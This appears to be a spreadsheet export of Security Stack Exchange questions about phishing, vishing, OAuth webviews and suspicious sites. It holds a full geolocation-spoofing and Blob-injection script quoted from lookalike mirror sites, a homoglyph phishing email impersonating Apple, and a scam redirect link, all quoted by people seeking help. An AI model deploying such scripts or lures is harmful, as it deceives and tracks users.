 &lt;p&gt;I then logged into my Gmail (using 2-step verification) on one of the computers at work (a hospital with old Netscape browsers behind hospital network firewall) and opened the email and clicked the link. I typed in my Gmail username and password again (but no authenticator Google 2nd step access code because I wasn't prompted.) &lt;/p&gt;
 &lt;p&gt;Still unable to access the "document," I moved my friend's email into my Gmail account's "Follow-up with" folder thinking I would try later at home with a modern browser. &lt;/p&gt;
 &lt;p&gt;I hadn't yet followed up when this morning I got an email from my friend explaining that his yahoo account had been hacked from Korea and that it was even generating automated responses. He added, "Don't click on any links!" &lt;/p&gt;
 &lt;p&gt;I immediately changed my account's password (about 17 hours after entering my info into the scam's site) but even if I didn't, those baddies don't have access to my phone and it's authenticator app so couldn't access my email, right? &lt;/p&gt;
 &lt;p&gt;Anyone have any thoughts?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;google&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>How to proceed if a new hash algorithm for passwords is introduced?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have an e-mail address at a certain institution. A few days ago they sent me an e-mail (in German), which I'd like to paraphrase without revealing the institution:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear Madams and Sirs,&lt;/p&gt;
  &lt;p&gt;a new identity management system has been introduced at the ... Together with the new system, a new password guideline came into effect. Thus, it is now necessary for every user to have his current password checked by the new system.&lt;br&gt;
  You will soon receive a personified e-mail with instructions on how to confirm the password via the webpage of the [name of IT department] of the ... (Web: [website of IT department] -&gt; ... -&gt; [confirm password])&lt;br&gt;
  We point out that at no point in time we will ask you to send your login or password via e-mail or to change or confirm your password on any other webpage than &lt;code&gt;https://idm...&lt;/code&gt; Communication with that webpage is always encrypted (https). You can check if the webpage indeed belongs to ... by clicking the lock symbol in the status bar of your browser. The fingerprint of the certificate is ...&lt;br&gt;
  In case you are still unsure whether the above request has in fact been sent by the ..., please contact the help desk. (Web: [website of IT department] -&gt; [Services] -&gt; ...) &lt;/p&gt;
  &lt;p&gt;Yours sincerely, ...&lt;br&gt;
  (security administrator)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Now this does &lt;em&gt;not&lt;/em&gt; look like a phishing e-mail to me, and a collegue has in fact contacted the help desk: they confirmed it was our IT department who sent the e-mail.&lt;/p&gt;
 &lt;p&gt;What I'd like to know is whether sending the above e-mail was appropriate. They told my collegue that they had to do this because of a new hash algorithm they're about to use. I&amp;nbsp;understand that they can't produce the new hashes from the old ones, but I&amp;nbsp;still think that doing it via such an e-mail is very strange at best: it just makes users more insecure when the next &lt;em&gt;real&lt;/em&gt; phishing e-mail arrives. What I find particularly dubious is the direct link to &lt;code&gt;https://idm...&lt;/code&gt; in the e-mail!&lt;/p&gt;
 &lt;p&gt;What I would have expected in such a case: The IT&amp;nbsp;department just sends a request that every user changes his e-mail until this and that date. Would that be a better approach? Or&amp;nbsp;was the IT&amp;nbsp;departments approach better?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; They sent the "personified e-mail" a day later. It contained two pieces of new information:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The sentence "The password has to be changed if it doesn't confirm to the new security rules",&lt;/li&gt;
 &lt;li&gt;a date until when I'll have to confirm my password.&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;</t>
  </si>
  <si>
    <t>Websites that fill back button history with questionable pages</t>
  </si>
  <si>
    <t>&lt;p&gt;Occasionally I see links like the &lt;a href="https://your-luckychance.com/?u=30wweky&amp;amp;o=pvkptz3&amp;amp;t=bboptions-hide&amp;amp;c_id=278869a7-dd27-4b17-a291-1cc7638c0b67" rel="nofollow noreferrer"&gt;following&lt;/a&gt; (&lt;strong&gt;don't visit this on your main computer&lt;/strong&gt;) that I am redirected to on Google. The back button will either redirect back to the page, or some other questionable content. These pages are almost always some scam or phishing attempt, and I wonder how exactly do they "disable" the back button functionality? I can long press the back button to view a &lt;a href="https://i.stack.imgur.com/vhd1a.png" rel="nofollow noreferrer"&gt;long list of the same exact link&lt;/a&gt; (this is a screenshot on Imgur), and eventually the search page is listed at the bottom (omitted for my privacy).&lt;/p&gt;
 &lt;p&gt;How do websites pull this back button hijacking off? And why does it not appear on actual search history? Is there any way to recognize this happening in the browser backend?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;browser-hijacking&gt;</t>
  </si>
  <si>
    <t>Do people use "phising" as a real term, or just a mistaken spelling of "phishing"</t>
  </si>
  <si>
    <t>&lt;p&gt;Is "phising" a commonly accepted term, or just a mis-spelling of "phishing"?&lt;/p&gt;
 &lt;p&gt;I've always understood "phishing" is a common security term. However, recently I've started seeing serious articles and people using the word "phising" (without the second h) as if they are serious. &lt;/p&gt;
 &lt;p&gt;For example, this entire page:
 &lt;code&gt;http://ferruh.mavituna.com/ssl-implementation-security-faq-oku/&lt;/code&gt; [link is now dead]&lt;/p&gt;
 &lt;p&gt;or this SO question:
 &lt;a href="https://stackoverflow.com/questions/4365294/is-redirecting-http-to-https-a-bad-idea"&gt;https://stackoverflow.com/questions/4365294/is-redirecting-http-to-https-a-bad-idea&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;terminology&gt;</t>
  </si>
  <si>
    <t>Why are developers using embedded user agents for 3rd party auth? What are the alternatives?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've noticed a trend in mobile and desktop apps in recent years with the advent of OAuth (and it may also affect other frameworks) to request a user to sign up or log in using 3rd party authentication providers, usually social accounts like Twitter, Facebook or Google. The problem comes when I can't trust the app I'm entering the credentials in, because the developer has embedded a browser in a dialog/window owned by the app, and I have &lt;strong&gt;no way to know&lt;/strong&gt; if the page I'm seeing is a legitimate login page, or that the user agent (browser and layers on top) can be trusted.&lt;/p&gt;
 &lt;p&gt;I'm not talking about apps from small indie devs either, I'm talking software by widely trusted companies (at least in the software development community where I spend most of my time). Some examples that I've seen in the last few weeks:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://www.sourcetreeapp.com/" rel="nofollow noreferrer"&gt;Atlassian Sourcetree&lt;/a&gt; allows you to log in using your Google account - in an Atlassian window&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://www.getpostman.com/" rel="nofollow noreferrer"&gt;Postman&lt;/a&gt; Google login occurs in a Postman window&lt;/li&gt;
 &lt;li&gt;Microsoft Visual Studio and Office do it with your Microsoft Account (granted, this is trusted a bit more as the app is owned by the auth provider, but it still endorses the process)&lt;/li&gt;
 &lt;li&gt;Some apps ask you to, for example, log into Paypal in a browser window inside their app&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Similar questions asked in the past regarding mobile apps (but the problem is not limited to mobile):&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/111543/how-do-i-verify-that-in-app-social-login-dialogs-are-secure"&gt;How do I verify that in-app social login dialogs are secure?
 &lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/141925/how-can-i-trust-that-this-is-google"&gt;How can I trust that this is Google?&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;One question related to a desktop app:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/141348/how-to-verify-google-sign-in-screen-is-legit-linux-desktop"&gt;How to verify Google sign-in screen is legit?&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;And tangentially related is the use of iframes in web applications:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/101071/what-are-the-security-implications-of-having-login-dialog-inside-of-an-iframe"&gt;What are the security implications of having login dialog inside of an iframe&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;This is an issue of trust for me when moving from app space to the web to authenticate, get a token and return back to the app. I might trust the companies enough to install their software, but not enough to enter the master keys to my Google account (for all intents and purposes) into their software.&lt;/p&gt;
 &lt;p&gt;In researching this question further I found &lt;a href="https://datatracker.ietf.org/doc/html/draft-ietf-oauth-native-apps-05#section-8" rel="nofollow noreferrer"&gt;this IETF draft&lt;/a&gt; which states:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Embedded user-agents are an alternative method for authorization native apps. They are however unsafe for use by third-parties to the authorization server by definition, as the app that hosts the embedded user-agent can access the user's full authentication credential, not just the OAuth authorization grant that was intended for the app.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; The draft above became &lt;a href="https://www.rfc-editor.org/rfc/rfc8252" rel="nofollow noreferrer"&gt;RFC8252&lt;/a&gt;, dated October 2017, thanks to @Geir for directing me to that.&lt;/p&gt;
 &lt;p&gt;and an &lt;a href="https://www.rfc-editor.org/rfc/rfc6749#page-52" rel="nofollow noreferrer"&gt;older directive, RFC6749&lt;/a&gt; (dated October 2012) which also mentions among other interesting tidbits:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;An embedded user-agent poses a security challenge because resource owners are authenticating in an unidentified window without access to the visual protections found in most external user-agents. An embedded user-agent educates end-users to trust unidentified requests for authentication (making phishing attacks easier to execute).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;My questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Am I right to be concerned that this is a growing opportunity for phishing and MITM attacks (fake or hijacked browser in the middle which steals credentials and/or tokens in real time, also defeating 2FA)? Not so much that trusted software itself is likely to be made malicious, but that widespread usage discourages users from verifying end-to-end trust, condoning (even encouraging) users to blindly enter credentials into any app that asks for them?&lt;/p&gt;
 &lt;p&gt;I think the last section quoted above answers undeniably in the affirmative, but I'm interested in further comments and perspective around this, particularly as a software developer myself.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The obvious &amp;quot;correct&amp;quot; way to do it is to forward the user to their trusted browser for authentication instead, however this can be a poor user experience, and doesn't actually fix the problem (a malicious developer could open a window from the main app that &lt;em&gt;looks&lt;/em&gt; like Chrome, but isn't - the fact user sessions from the main browser window are not preserved, among other visual cues would probably go unnoticed by most).&lt;/p&gt;
 &lt;p&gt;Is there a better way to design the user experience of apps such that a user can be sure they are using a trusted software stack (app and rendering engine), in-app? Should there be device- or system-level handling of such auth requests in a way that's hard to mimic?&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I'm not really involved in the security scene, just a lurker here, is this a well known concern in the industry? Are there efforts to curb this sort of authentication flow?&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;man-in-the-middle&gt;&lt;oauth&gt;&lt;phishing&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Will CA's revoke a certificate to phishing websites</t>
  </si>
  <si>
    <t>&lt;p&gt;Usually, websites will say "don't sign in unless you see the secure icon". If the user hasn't noticed that the URL is wrong (or is misleading like &lt;a href="https://www.wordfence.com/blog/2017/04/chrome-firefox-unicode-phishing/" rel="nofollow noreferrer"&gt;this&lt;/a&gt; recent security firm has discovered), and purely trusts that icon, they may fall victim to a phishing attack. In this case, would a CA revoke the phishing site's certificate, or am I missing the point of revocation? Also, if CAs do revoke certificates for phishing sites, are there any well known examples?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;web-browser&gt;</t>
  </si>
  <si>
    <t>Malicious looking mirrors resembling trademarked websites? Phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I honestly have no idea what this is.&lt;/p&gt;
 &lt;p&gt;Reddit has a growing number of users posting far-right misinformation constantly. Googling their usernames shows a whole list of results, many of which don't belong to reddit, but seem like mirrors.&lt;/p&gt;
 &lt;p&gt;Hull City Tigers are a football club based in Hull. This is their actual website.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.hullcitytigers.com/" rel="nofollow noreferrer"&gt;https://www.hullcitytigers.com/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This is the mirror showing a reddit comment on google search.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://hullcitytigers.com/p/Chodi/comments/mtcqjo/maa_bahu_mil_gayi/" rel="nofollow noreferrer"&gt;https://hullcitytigers.com/p/Chodi/comments/mtcqjo/maa_bahu_mil_gayi/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The site itself only has one script called &lt;code&gt;hookgeo()&lt;/code&gt;, no other content.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;(function(){function hookGeo() {
  //&amp;lt;![CDATA[
  const WAIT_TIME = 100;
  const hookedObj = {
  getCurrentPosition: navigator.geolocation.getCurrentPosition.bind(navigator.geolocation),
  watchPosition: navigator.geolocation.watchPosition.bind(navigator.geolocation),
  fakeGeo: true,
  genLat: 38.883333,
  genLon: -77.000
  };
  function waitGetCurrentPosition() {
  if ((typeof hookedObj.fakeGeo !== 'undefined')) {
  if (hookedObj.fakeGeo === true) {
  hookedObj.tmp_successCallback({
  coords: {
  latitude: hookedObj.genLat,
  longitude: hookedObj.genLon,
  accuracy: 10,
  altitude: null,
  altitudeAccuracy: null,
  heading: null,
  speed: null,
  },
  timestamp: new Date().getTime(),
  });
  } else {
  hookedObj.getCurrentPosition(hookedObj.tmp_successCallback, hookedObj.tmp_errorCallback, hookedObj.tmp_options);
  }
  } else {
  setTimeout(waitGetCurrentPosition, WAIT_TIME);
  }
  }
  function waitWatchPosition() {
  if ((typeof hookedObj.fakeGeo !== 'undefined')) {
  if (hookedObj.fakeGeo === true) {
  navigator.getCurrentPosition(hookedObj.tmp2_successCallback, hookedObj.tmp2_errorCallback, hookedObj.tmp2_options);
  return Math.floor(Math.random() * 10000); // random id
  } else {
  hookedObj.watchPosition(hookedObj.tmp2_successCallback, hookedObj.tmp2_errorCallback, hookedObj.tmp2_options);
  }
  } else {
  setTimeout(waitWatchPosition, WAIT_TIME);
  }
  }
  Object.getPrototypeOf(navigator.geolocation).getCurrentPosition = function (successCallback, errorCallback, options) {
  hookedObj.tmp_successCallback = successCallback;
  hookedObj.tmp_errorCallback = errorCallback;
  hookedObj.tmp_options = options;
  waitGetCurrentPosition();
  };
  Object.getPrototypeOf(navigator.geolocation).watchPosition = function (successCallback, errorCallback, options) {
  hookedObj.tmp2_successCallback = successCallback;
  hookedObj.tmp2_errorCallback = errorCallback;
  hookedObj.tmp2_options = options;
  waitWatchPosition();
  };
  const instantiate = (constructor, args) =&amp;gt; {
  const bind = Function.bind;
  const unbind = bind.bind(bind);
  return new (unbind(constructor, null).apply(null, args));
  }
  Blob = function (_Blob) {
  function secureBlob(...args) {
  const injectableMimeTypes = [
  { mime: 'text/html', useXMLparser: false },
  { mime: 'application/xhtml+xml', useXMLparser: true },
  { mime: 'text/xml', useXMLparser: true },
  { mime: 'application/xml', useXMLparser: true },
  { mime: 'image/svg+xml', useXMLparser: true },
  ];
  let typeEl = args.find(arg =&amp;gt; (typeof arg === 'object') &amp;amp;&amp;amp; (typeof arg.type === 'string') &amp;amp;&amp;amp; (arg.type));
  if (typeof typeEl !== 'undefined' &amp;amp;&amp;amp; (typeof args[0][0] === 'string')) {
  const mimeTypeIndex = injectableMimeTypes.findIndex(mimeType =&amp;gt; mimeType.mime.toLowerCase() === typeEl.type.toLowerCase());
  if (mimeTypeIndex &amp;gt;= 0) {
  let mimeType = injectableMimeTypes[mimeTypeIndex];
  let injectedCode = `&amp;lt;script&amp;gt;(
  ${hookGeo}
  )();&amp;lt;\/script&amp;gt;`;
  let parser = new DOMParser();
  let xmlDoc;
  if (mimeType.useXMLparser === true) {
  xmlDoc = parser.parseFromString(args[0].join(''), mimeType.mime); // For XML documents we need to merge all items in order to not break the header when injecting
  } else {
  xmlDoc = parser.parseFromString(args[0][0], mimeType.mime);
  }
  if (xmlDoc.getElementsByTagName(&amp;quot;parsererror&amp;quot;).length === 0) { // if no errors were found while parsing...
  xmlDoc.documentElement.insertAdjacentHTML('afterbegin', injectedCode);
  if (mimeType.useXMLparser === true) {
  args[0] = [new XMLSerializer().serializeToString(xmlDoc)];
  } else {
  args[0][0] = xmlDoc.documentElement.outerHTML;
  }
  }
  }
  }
  return instantiate(_Blob, args); // arguments?
  }
  // Copy props and methods
  let propNames = Object.getOwnPropertyNames(_Blob);
  for (let i = 0; i &amp;lt; propNames.length; i++) {
  let propName = propNames[i];
  if (propName in secureBlob) {
  continue; // Skip already existing props
  }
  let desc = Object.getOwnPropertyDescriptor(_Blob, propName);
  Object.defineProperty(secureBlob, propName, desc);
  }
  secureBlob.prototype = _Blob.prototype;
  return secureBlob;
  }(Blob);
  window.addEventListener('message', function (event) {
  if (event.source !== window) {
  return;
  }
  const message = event.data;
  switch (message.method) {
  case 'updateLocation':
  if ((typeof message.info === 'object') &amp;amp;&amp;amp; (typeof message.info.coords === 'object')) {
  hookedObj.genLat = message.info.coords.lat;
  hookedObj.genLon = message.info.coords.lon;
  hookedObj.fakeGeo = message.info.fakeIt;
  }
  break;
  default:
  break;
  }
  }, false);
  //]]&amp;gt;
 }hookGeo();})()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There are so many of these. And they all have the same script, no content. They're all behind cloudflare.&lt;/p&gt;
 &lt;p&gt;What is this exactly? What is this supposed to be doing, what does the script do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why do they put cyrillic letters in phishing email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have just received this email:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;F–æ–≥ —É–æu–≥ —Ä–≥–æt–µ—Åt—ñ–æn, —É–æu–≥ Œë—Ä—Äl–µ ID —ñ—ï –∞ut–æm–∞t—ñ—Å–∞ll—É disabled. 
 W–µ h–∞ŒΩ–µ —Ä–≥–µŒΩ–µnt–µd –∞n unu—ïu–∞l —ï—ñgn —ñn –∞tt–µm—Ät –æn —É–æu–≥ Œë—Ä—Äl–µ –∞—Å—Å–æunt.–¢h—ñ—ï –∞—Å—Å–æunt h–∞—ï –¨–µ–µn l–æ—Å–∫–µd –¨–µ—Å–∞u—ï–µ —ï—ñgn—ñng —ñn f–≥–æm –∞ n–µw l–æ—Å–∞t—ñ–æn –æ–≥ f–≥–æm –∞ d—ñff–µ–≥–µnt d–µŒΩ—ñ—Å–µ. –†l–µ–∞—ï–µ –≥–µŒΩ—ñ–µw th–µ —ï—ñgn —ñn d–µt–∞—ñl—ï –¨–µl–æw: 
 Œ•–æu–≥ –∞—Å—Å–æunt –∞—Å—Å–µ—ï—ï h–∞—ï –¨–µ–µn l–æ—Å–∫–µd f–æ–≥ th–µ f–æll–æw—ñng –≥–µ–∞—ï–æn(—ï):
 W–µ —Åh–µ—Å–∫ —É–æu–≥ –∞—Å—Å–æunt l–æg—ñn w—ñth –æth–µ–≥ d–µŒΩ—ñ—Å–µ.
 Œ•–æu–≥ –∞—Å—Å–æunt h–∞—ï –¨–µ–µn l–æ—Å–∫–µd unt—ñl th—ñ—ï —ñ—ï—ïu–µd h–∞—ï –¨–µ–µn –≥–µ—ï–ælŒΩ–µd, w–µ w—ñll w–∞—ñt—ñng f–æ–≥ 1 w–µ–µ–∫ –æ–≥ —É–æu–≥ –∞—Å—Å–æunt h–∞—ï –¨–µ–µn l–æ—Å–∫–µd —Ä–µ–≥m–∞n–µntl—É.
 Wh–∞t t–æ d–æ Œù–µ—Öt: 
 –†l–µ–∞—ï–µ –°l—ñ—Å–∫ th–µ l–æg—ñn –¨utt–æn –¨–µl–æw t–æ —É–æu–≥ Œë—Ä—Äl–µ –∞—Å—Å–æunt –∞nd —Ä–≥–æŒΩ—ñd–µ th–µ –≥–µqu–µ—ït–µd —ñnf–æ–≥m–∞t—ñ–æn –¨–µf–æ–≥–µ 1 w–µ–µ–∫. –¢h–≥–æugh th–µ –∞—Å—Å–æunt –≥–µŒΩ—ñ–µw, —ñf w–µ d–æn't –≥–µ—Å–µ—ñŒΩ–µd th–µ —ñnf–æ–≥m–∞t—ñ–æn –¨–µf–æ–≥–µ th—ñ—ï d–µ–∞dl—ñn–µ, —É–æu–≥ –∞—Å—Å–æunt –∞—Å—Å–µ—ï—ï w—ñll –¨–µ l–æ—Å–∫–µd —Ä–µ–≥m–∞n–µntl—É.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Why are these letters used: –¨, ŒΩ, –∫? It makes easier to detect that the message is not genuine.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are URL shorteners "vulnerable" due to open redirects?</t>
  </si>
  <si>
    <t>&lt;p&gt;The OWASP state that &lt;a href="https://www.owasp.org/index.php/Open_redirect" rel="nofollow"&gt;open redirect is a vulnerability&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;An open redirect is an application that &lt;strong&gt;takes a parameter and
  redirects&lt;/strong&gt; a user to the parameter value &lt;strong&gt;without any validation&lt;/strong&gt;. This
  vulnerability is used in phishing attacks to get users to visit
  malicious sites without realizing it.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However, it's trivial for an attacker to create a phishing URL and get it shortened, thus "get[ting] users to visit malicious sites without realizing it".&lt;/p&gt;
 &lt;p&gt;Does this mean that all URL shorteners (e.g &lt;a href="http://bit.ly" rel="nofollow"&gt;bit.ly&lt;/a&gt;, &lt;a href="http://goo.gl" rel="nofollow"&gt;goo.gl&lt;/a&gt;, etc) are &lt;em&gt;by definition&lt;/em&gt; vulnerable?&lt;/p&gt;
 &lt;p&gt;How can a URL shortener be fixed/modified such that it does not violate OWASP?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;http&gt;&lt;known-vulnerabilities&gt;&lt;owasp-top-ten&gt;</t>
  </si>
  <si>
    <t>Banking application login leaks information</t>
  </si>
  <si>
    <t>&lt;p&gt;My question is regarding the online banking application of a large credit card organisation. The login process for this application works as follows:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;User visits the homepage of the bank.&lt;/li&gt;
 &lt;li&gt;User enters their username and clicks login.&lt;/li&gt;
 &lt;li&gt;If the username exists they are presented with their unique image and phrase, chosen by the user when they sign up to the online banking application. If the image and phrase are as expected, the user enters their password.&lt;/li&gt;
 &lt;li&gt;If correct, the user is authenticated and has full access to their account, including viewing statements, paying bills, increasing/decreasing credit limits, etc.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The problem I find here is that if one knows the username of a user, they can enter this into the first stage and immediately be presented with the image/phrase combination for that account. An attacker could then easily use this information in a phishing attack against that user.&lt;/p&gt;
 &lt;p&gt;My question is: &lt;/p&gt;
 &lt;p&gt;Isn't this a large security flaw? &lt;/p&gt;
 &lt;p&gt;Addition: In response to the first answer I should add that upon providing a username which does not exist, the application responds with a "Please check the username provided" message. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;authentication&gt;&lt;banks&gt;&lt;sitekey&gt;</t>
  </si>
  <si>
    <t>Could EA know my password across multiple sites?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few days ago I received an email from EA stating they reset my password because it &lt;em&gt;may&lt;/em&gt; be compromised:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The password for your Origin account was recently reset because a standard systems analysis indicated that your user name and password may have been subject to suspicious activity. We have no reason to believe at this time that the suspicious activity is the result of unauthorised access to EA‚Äôs databases. Instead, such activity could be related to issues with phishing, use of weak passwords, logging in from shared connections or even using the same password on multiple websites. We apologise for any inconvenience this may cause you and hope you will recognise we‚Äôre taking this action to better protect your personal data.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;This happened on the day that my Steam account was hacked and the user changed the email and password for Steam. My Steam account had no EA games on it, but they both used the same email and password. &lt;/p&gt;
 &lt;p&gt;In my mind that leaves two options of why my password was reset:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;the Steam hacker tried to access my EA account with the same credentials but flagged something likely based on location of log in.&lt;/li&gt;
 &lt;li&gt;EA's "standard systems analysis" noticed I had used the same email and password and flagged it.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;In my opinion it seems more likely it is #2 because it didn't appear anyone accessed my EA account, there were no signs I had an EA account from Steam, and the email states "using the same password on multiple websites" is a reason for changing. &lt;/p&gt;
 &lt;p&gt;If it is #2 like I believe it is how could EA possibly know I used the same password on both accounts without not only knowing my EA password but knowing my Steam password as well? If they couldn't know that why would they include that line in their email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Security: Oauth and Mobile apps</t>
  </si>
  <si>
    <t>&lt;p&gt;This is what I believe are the security implications of integrating Oauth using embedded webview vs browser in mobile application.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Embedded Webview
 * Keep UI for mobile app
  Security implications 
  * Makes phishing easy (especially since no address bar to show url and security)
 Browser
 * Different UI/Context switch (downsides)
 Security - (good) :Less phishing ... can see url in address bar
 (bad): Bad app can take over custom url scheme and have access to code.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is there a way to have a secure mobile solution for oauth integration in mobile?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;ios&gt;&lt;oauth&gt;</t>
  </si>
  <si>
    <t>Fake Microsoft Security Department</t>
  </si>
  <si>
    <t>&lt;p&gt;Someone called my home saying that he was calling from Windows Security Department. He said that there are about 16 other people connected to my computer and they're doing illegal things online. He told me to go to my computer, go to some site, save the file, run it, and then asked me to tell him the numbers in the boxes.&lt;/p&gt;
 &lt;p&gt;I did as he asked, then I asked him to be specific about the company he worked for; he kept hesitating and saying Windows Security Department. I found it strange, and then it occurred to me that this may be a scam. I said that this seems like a scam, and he said &amp;quot;What is this scam you speak of&amp;quot;. I knew then that I was a victim of a scam (what I now know to be vishing). I kept trying to access Google to look it up, but my mouse wasn't working anymore. He was in full control, still trying to cover it up, saying, &amp;quot;Let me show you the problems&amp;quot;.&lt;/p&gt;
 &lt;p&gt;A series of WARNING signs showed up on this page. He said these are the issues. He was talking, and pausing, so I thought that he was accessing some data on my laptop that I couldn't see. I shut off my computer immediately, and he was like, &amp;quot;WHAT HAVE YOU DONE&amp;quot;? ....... &amp;quot;Did you shut down your laptop?&amp;quot; I was hesitating, wondering if he was really legit, and that I just interrupted what he might have been doing to assist. He was like, it's ok, turn your computer back on and we'll call back in like 15 min, don't do anything to your computer and we will try to reconnect again, leave it as is. I said, well, that means that you'll be able to see everything on my computer and gain control again. He said, &amp;quot;Yes, but&amp;quot;. I cut him off, saying, &amp;quot;You know what, don't hang up, hold on, I'm researching something, this isn't right.&amp;quot; He said, &amp;quot;What, why?&amp;quot; with a shaky voice, and I was like, &amp;quot;don't worry about it, just stay on the line&amp;quot;, and he hung up. I never received a call from him again.&lt;/p&gt;
 &lt;p&gt;I knew there were hackers online, etc... but never heard of or experienced those who called your house phone. I went into my control panel and deleted something called (Pen Vpn) that was installed today during the process, as well as a (Team Viewer QS) file which was also downloaded. I purchased security software, installed and ran it. It found two things and supposedly got rid of them. Hopefully, that did the trick.&lt;/p&gt;
 &lt;p&gt;Can you give any suggestions as to what I could try to ensure that my laptop is protected? Although I would like to think that my laptop is now safe, I'm not 100% sure that did the trick. For all I know, they could be reading this as I type.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are the potential risks of performing DNS queries on unknown domains?</t>
  </si>
  <si>
    <t>&lt;p&gt;When investigating malicious domains that are used for phishing, malware, etc, you often have to issue DNS queries for these domains.&lt;/p&gt;
 &lt;p&gt;For example:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;dig @1.1.1.1 example.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The potential risks of issuing this command are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;A maliciously crafted DNS record could try to exploit my DNS utility&lt;/li&gt;
 &lt;li&gt;A maliciously crafted DNS record could try to exploit my terminal&lt;/li&gt;
 &lt;li&gt;The DNS zone I am querying could be delegated to another, potentially malicious DNS server&lt;/li&gt;
 &lt;li&gt;Possible privacy violations[?]&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Are there any other potential risks that I have missed or considerations that I should make?&lt;/p&gt;
 &lt;p&gt;Do you think that this is a valid concern?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Forged linkedin invitation phishing? How does it work?</t>
  </si>
  <si>
    <t>&lt;p&gt;I get a steady stream of phishing emails but this one is really weird. I keep getting an email that appears extremely legitimate from Linkedin. I knew something was wrong with it however because it came to an address I do not use for Linkedin and moreover the person who was supposedly requesting the connection says she never sent it, so it would appear to be a forgery. The email address was known to my counterparty, so it is possible her computer is hacked and they vacuumed her email address book to get my address.&lt;/p&gt;
 &lt;p&gt;The only problem is that the clickable link in the email does appear to go to Linkedin. Here is the link (edited slight to invalidate the tokens):&lt;/p&gt;
 &lt;blockquote&gt;
